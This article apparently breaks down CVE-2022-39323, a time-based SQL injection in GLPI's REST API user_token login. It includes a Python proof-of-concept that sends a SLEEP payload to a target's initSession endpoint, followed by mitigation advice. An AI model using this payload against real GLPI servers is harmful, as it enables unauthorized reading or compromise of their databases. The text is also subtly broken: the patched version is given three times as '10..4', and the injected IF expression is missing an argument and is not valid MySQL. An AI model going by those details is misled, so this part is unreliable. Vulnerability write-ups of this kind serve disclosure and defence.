CVE-2022-39323 - Exploiting Time-Based SQL Injection in GLPI REST API’s user_token (Exclusive Breakdown)

GLPI, short for Gestionnaire Libre de Parc Informatique, is a popular open-source IT Asset Management and Helpdesk software. It's used by countless organizations for tracking inventory, managing tickets, controlling licenses, and supporting ITIL help desk workflows.

In late 2022, a critical security issue was identified and assigned CVE-2022-39323. This vulnerability allows attackers to conduct a time-based SQL injection via the REST API's user_token authentication mechanism.

This article provides an in-depth, easy-to-follow breakdown of the flaw, gives a real exploit example, and guides on how to mitigate it.

What is CVE-2022-39323?

- CVE ID: CVE-2022-39323

Vulnerable Component: API REST authentication (user_token)

- Type of Flaw: SQL Injection (Time-based/Binary)

Official References

- GLPI Security Advisory: https://github.com/glpi-project/glpi/security/advisories/GHSA-5mc5-55jr-mvr3
- NVD Entry: https://nvd.nist.gov/vuln/detail/CVE-2022-39323

How Does the Vulnerability Work?

The GLPI REST API lets users authenticate using a personal user_token. During login, this token is directly used in a SQL query without sufficient validation. As a result, attackers can inject SQL commands inside the token value.

The most dangerous part: You don’t even need to be authenticated ahead of time! Just send a malicious user_token and look for differences in API responses. Using time-based SQL injection, you exploit how long the server takes to respond (if it’s longer, you know your payload "worked").

Proof-of-Concept (PoC) Exploit

Below is an exclusive code example demonstrating how an attacker could use Python to verify the vulnerability in a GLPI instance running a vulnerable version (BEFORE 10..4). [Use only in controlled, authorized environments.]

import requests
import time

TARGET_URL = 'https://victim-glpi-instance.com/apirest.php/initSession';

# Craft payload: 5 seconds delay if the query is true (MySQL syntax)
payload = "' OR IF(1=1, SLEEP(5), ) -- "

headers = {
    'Content-Type': 'application/json',
    'App-Token': 'YOUR-APP-TOKEN'
}
body = {'user_token': payload}

# Measure response time
start = time.time()
response = requests.post(TARGET_URL, json=body, headers=headers)
elapsed = time.time() - start

if elapsed > 5:
    print("Vulnerable to CVE-2022-39323 (Time-based SQL Injection)!")
else:
    print("Probably Patched or Not Vulnerable.")

The script sends a login with a manipulated user_token.

- The injected SQL includes SLEEP(5), causing the database to pause for 5 seconds if the injection is successful.

With this type of SQL injection

- Attackers can: Enumerate users, extract password hashes, leak table contents, or fully compromise the database.

How Was the Issue Fixed?

The flaw was patched in GLPI 10..4. The fix adds correct value escaping and parameterized queries during API authentication, preventing injection attacks.

- GLPI 10..4 Release Notes

Disable login with user_token in the API REST. This shuts off the vulnerable attack vector.

Check your config/config_db.php or the API settings to revoke or disable user token authentication for the REST API.

Conclusion

CVE-2022-39323 shows how dangerous SQL injection remains—even in mature open-source tools. Always ensure you keep your software up to date. Review API authentication flows, and avoid using user-supplied data directly inside SQL queries.

Are you running GLPI? Double-check your version and update if needed, or disable user_token authentication right away!


> References
> - GLPI Security Advisory GHSA-5mc5-55jr-mvr3
> - CVE-2022-39323 on NIST NVD
> - GLPI Releases

Timeline

Published on: 11/03/2022 15:15:00 UTC
Last modified on: 11/03/2022 18:28:00 UTC